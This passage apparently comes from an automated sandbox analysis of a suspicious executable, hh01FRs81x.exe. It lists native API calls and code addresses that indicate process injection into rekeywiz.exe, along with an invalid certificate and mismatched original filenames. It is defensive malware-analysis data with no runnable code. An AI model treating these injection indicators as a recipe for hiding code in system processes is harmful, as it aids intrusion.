                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702AD0 NtReadFile,LdrInitializeThunk,7_2_04702AD0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702B60 NtClose,LdrInitializeThunk,7_2_04702B60
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04702BF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04702BE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04702BA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047035C0 NtCreateMutant,LdrInitializeThunk,7_2_047035C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047039B0 NtGetContextThread,LdrInitializeThunk,7_2_047039B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702C00 NtQueryInformationProcess,7_2_04702C00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702CF0 NtOpenProcess,7_2_04702CF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702CC0 NtQueryVirtualMemory,7_2_04702CC0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702D00 NtSetInformationFile,7_2_04702D00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702DB0 NtEnumerateKey,7_2_04702DB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702E30 NtWriteVirtualMemory,7_2_04702E30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702EA0 NtAdjustPrivilegesToken,7_2_04702EA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702F60 NtCreateProcessEx,7_2_04702F60
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702FA0 NtQuerySection,7_2_04702FA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702F90 NtProtectVirtualMemory,7_2_04702F90
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702AB0 NtWaitForSingleObject,7_2_04702AB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04702B80 NtQueryInformationFile,7_2_04702B80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703010 NtOpenDirectoryObject,7_2_04703010
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703090 NtSetValueKey,7_2_04703090
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703D70 NtOpenThread,7_2_04703D70
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04703D10 NtOpenProcessToken,7_2_04703D10
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F9370 NtCreateFile,7_2_006F9370
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F94E0 NtReadFile,7_2_006F94E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F95D0 NtDeleteFile,7_2_006F95D0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F9670 NtClose,7_2_006F9670
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006F97C0 NtAllocateVirtualMemory,7_2_006F97C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EFA81 NtSetContextThread,7_2_049EFA81
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EFACD NtSetContextThread,7_2_049EFACD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_008CE0DC0_2_008CE0DC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_057C01300_2_057C0130
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_057C01200_2_057C0120
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05CBEC900_2_05CBEC90
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05CB4E600_2_05CB4E60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05CBD3670_2_05CBD367
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05CBD3780_2_05CBD378
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05CB4EF00_2_05CB4EF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05DFA0440_2_05DFA044
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05DF0B200_2_05DF0B20
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05DFB7F10_2_05DFB7F1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05DF00400_2_05DF0040
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_06185F500_2_06185F50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_061897200_2_06189720
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_0618B2980_2_0618B298
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_061892D80_2_061892D8
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_061892E80_2_061892E8
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_06188EB00_2_06188EB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_0618A9B00_2_0618A9B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_0618A9C00_2_0618A9C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004019B34_2_004019B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00418A134_2_00418A13
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0040484B4_2_0040484B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0042F1534_2_0042F153
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004101B34_2_004101B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004032304_2_00403230
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004103D34_2_004103D3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004023DF4_2_004023DF
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0040E3B34_2_0040E3B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00416C234_2_00416C23
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0040E4F74_2_0040E4F7
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0040457E4_2_0040457E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0040E5034_2_0040E503
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004026FB4_2_004026FB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004027004_2_00402700
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F81584_2_016F8158
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016601004_2_01660100
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170A1184_2_0170A118
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017281CC4_2_017281CC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017241A24_2_017241A2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017301AA4_2_017301AA
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017321AE4_2_017321AE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017020004_2_01702000
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172A3524_2_0172A352
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017303E64_2_017303E6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167E3F04_2_0167E3F0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F02C04_2_016F02C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016705354_2_01670535
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017305914_2_01730591
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017224464_2_01722446
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017144204_2_01714420
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171E4F64_2_0171E4F6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016707704_2_01670770
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016947504_2_01694750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166C7C04_2_0166C7C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168C6E04_2_0168C6E0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016869624_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A04_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167A8404_2_0167A840
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169E8F04_2_0169E8F0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016568B84_2_016568B8
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172AB404_2_0172AB40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01726BD74_2_01726BD7
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172EB894_2_0172EB89
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA804_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167AD004_2_0167AD00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170CD1F4_2_0170CD1F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166ADE04_2_0166ADE0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01678DC04_2_01678DC0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01688DBF4_2_01688DBF
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670C004_2_01670C00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660CF24_2_01660CF2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E4F404_2_016E4F40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01712F304_2_01712F30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016B2F284_2_016B2F28
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01690F304_2_01690F30
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01662FC84_2_01662FC8
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EEFA04_2_016EEFA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172EE264_2_0172EE26
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172EEDB4_2_0172EEDB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172CE934_2_0172CE93
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682E904_2_01682E90
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A516C4_2_016A516C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165F1724_2_0165F172
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0173B16B4_2_0173B16B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167B1B04_2_0167B1B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172F0E04_2_0172F0E0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017270E94_2_017270E9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171F0CC4_2_0171F0CC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165D34C4_2_0165D34C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172132D4_2_0172132D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168D2F04_2_0168D2F0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017112ED4_2_017112ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168B2C04_2_0168B2C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016752A04_2_016752A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017275714_2_01727571
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017395C34_2_017395C3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170D5B04_2_0170D5B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016614604_2_01661460
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172F43F4_2_0172F43F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016617EC4_2_016617EC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172F7B04_2_0172F7B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016B56304_2_016B5630
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017216CC4_2_017216CC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016799504_2_01679950
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168B9504_2_0168B950
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017059104_2_01705910
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016759904_2_01675990
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DD8004_2_016DD800
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016738E04_2_016738E0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FB764_2_0172FB76
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016ADBF94_2_016ADBF9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E5BF04_2_016E5BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168FB804_2_0168FB80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E3A6C4_2_016E3A6C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01727A464_2_01727A46
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FA494_2_0172FA49
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171DAC64_2_0171DAC6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01711AA34_2_01711AA3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170DAAC4_2_0170DAAC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01727D734_2_01727D73
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01721D5A4_2_01721D5A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168FDC04_2_0168FDC0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E9C324_2_016E9C32
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FCF24_2_0172FCF2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FF094_2_0172FF09
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01633FD24_2_01633FD2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01633FD54_2_01633FD5
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FFB14_2_0172FFB1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01671F924_2_01671F92
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01679EB04_2_01679EB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047824467_2_04782446
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047744207_2_04774420
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0477E4F67_2_0477E4F6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D05357_2_046D0535
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047905917_2_04790591
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EC6E07_2_046EC6E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D07707_2_046D0770
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046F47507_2_046F4750
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046CC7C07_2_046CC7C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047620007_2_04762000
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047581587_2_04758158
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C01007_2_046C0100
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476A1187_2_0476A118
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047881CC7_2_047881CC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047901AA7_2_047901AA
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047921AE7_2_047921AE
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047502C07_2_047502C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478A3527_2_0478A352
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DE3F07_2_046DE3F0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047903E67_2_047903E6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D0C007_2_046D0C00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C0CF27_2_046C0CF2
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476CD1F7_2_0476CD1F
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DAD007_2_046DAD00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046CADE07_2_046CADE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D8DC07_2_046D8DC0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046E8DBF7_2_046E8DBF
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478EE267_2_0478EE26
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478EEDB7_2_0478EEDB
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478CE937_2_0478CE93
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046E2E907_2_046E2E90
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04744F407_2_04744F40
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04772F307_2_04772F30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04712F287_2_04712F28
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046F0F307_2_046F0F30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C2FC87_2_046C2FC8
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0474EFA07_2_0474EFA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DA8407_2_046DA840
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046FE8F07_2_046FE8F0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046B68B87_2_046B68B8
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046E69627_2_046E6962
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D29A07_2_046D29A0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046CEA807_2_046CEA80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04786BD77_2_04786BD7
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478EB897_2_0478EB89
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C14607_2_046C1460
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478F43F7_2_0478F43F
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047875717_2_04787571
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476D5B07_2_0476D5B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047816CC7_2_047816CC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C17EC7_2_046C17EC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478F7B07_2_0478F7B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047870E97_2_047870E9
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478F0E07_2_0478F0E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0477F0CC7_2_0477F0CC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0479B16B7_2_0479B16B
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046BF1727_2_046BF172
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0470516C7_2_0470516C
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DB1B07_2_046DB1B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047712ED7_2_047712ED
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046ED2F07_2_046ED2F0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EB2C07_2_046EB2C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D52A07_2_046D52A0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046BD34C7_2_046BD34C
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478132D7_2_0478132D
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04749C327_2_04749C32
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04787D737_2_04787D73
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04781D5A7_2_04781D5A
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EFDC07_2_046EFDC0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D9EB07_2_046D9EB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FF097_2_0478FF09
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04693FD27_2_04693FD2
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04693FD57_2_04693FD5
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FFB17_2_0478FFB1
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D1F927_2_046D1F92
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0473D8007_2_0473D800
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D38E07_2_046D38E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D99507_2_046D9950
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EB9507_2_046EB950
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047659107_2_04765910
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D59907_2_046D5990
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04743A6C7_2_04743A6C
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FA497_2_0478FA49
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04787A467_2_04787A46
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0477DAC67_2_0477DAC6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04771AA37_2_04771AA3
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476DAAC7_2_0476DAAC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FB767_2_0478FB76
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04745BF07_2_04745BF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0470DBF97_2_0470DBF9
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EFB807_2_046EFB80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E1E907_2_006E1E90
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DB0247_2_006DB024
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DB0307_2_006DB030
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006D10AB7_2_006D10AB
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006D13787_2_006D1378
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E55407_2_006E5540
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E37507_2_006E3750
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DCCE07_2_006DCCE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006FBC807_2_006FBC80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DAEE07_2_006DAEE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DCF007_2_006DCF00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EE4237_2_049EE423
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EE7BC7_2_049EE7BC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EE3047_2_049EE304
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049ED8887_2_049ED888
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049ECB237_2_049ECB23
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016EF290 appears 98 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016B7E54 appears 102 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016DEA12 appears 76 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016A5130 appears 53 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 0165B970 appears 210 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 04717E54 appears 93 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 0473EA12 appears 76 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 04705130 appears 53 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 046BB970 appears 210 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 0474F290 appears 98 times
                Source: hh01FRs81x.exeStatic PE information: invalid certificate
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.00000000026F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000000.873899011.00000000001B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIfzV.exe0 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.957610210.0000000007C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.957046670.0000000005E00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.953657489.0000000003621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.953657489.0000000003621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs hh01FRs81x.exe
